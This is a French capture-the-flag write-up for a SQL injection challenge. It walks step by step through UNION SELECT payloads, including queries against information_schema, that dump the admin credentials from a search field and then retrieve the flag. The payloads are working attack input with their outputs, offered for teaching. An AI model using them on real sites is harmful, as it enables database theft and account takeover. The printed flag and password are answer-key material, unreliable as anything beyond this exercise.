Writeup
=======

Exploitation d'une SQLi dans le champ de recherche.

Exploitation&nbsp;:

Regarder le code source (ctrl+u) pour trouver "admin.php".

Aller sur la page rechercher.php et injecter un quote : '
--> You have an error in your SQL syntax

Commencer une injection SQL en recherchant:

Trouver le nombre de colones:
' GROUP BY 1#
' GROUP BY 3#
' GROUP BY 6#
--> Unknown column '6' 
' GROUP BY 5#
Il y a donc 5 colones.

1ère méthode [Guessing]:
xyz' UNION SELECT 1,2,3,4,5 FROM accounts#
--> Table 'db.accounts' doesn't exist 
xyz' UNION SELECT 1,2,3,4,5 FROM users#
On trouve la table users, on cherche les champs:
xyz' UNION SELECT 1,2,3,user,5 FROM users#
On trouve la colone user qui renvoi "admin"
xyz' UNION SELECT 1,2,3,user,pass FROM users#
On trouve la colone pass qui renvoi "S€cr3t-p4$$w0o0rd!"

2ème méthode [Information_schema]
On récupère la base de donnée "db" avec:
xyz' UNION SELECT 1,2,3,schema_name,5 FROM information_schema.schemata#
Puis on récupère les tables de la base avec:
xyz' UNION SELECT 1,2,3,table_schema,table_name FROM information_schema.tables WHERE table_schema = 'db'#
On obtient donc les tables jeux et users. On dump les colones des tables:
xyz' UNION SELECT 1,2,table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema = 'db'#
On voit donc que la table users a deux colones: user et pass. On affiche le contenu de la table:
xyz' UNION SELECT 1,2,3,user,pass FROM users#
Les colones users et pass nous renvoit "admin" et "S€cr3t-p4$$w0o0rd!"


Après avoir récupéré ces informations, on se connecte sur la page admin.php précédement découverte.
On récupère le flag après s'être identifié.



Flag&nbsp;: `ENSIBS{HopeYouDidntStoleMyGames}`
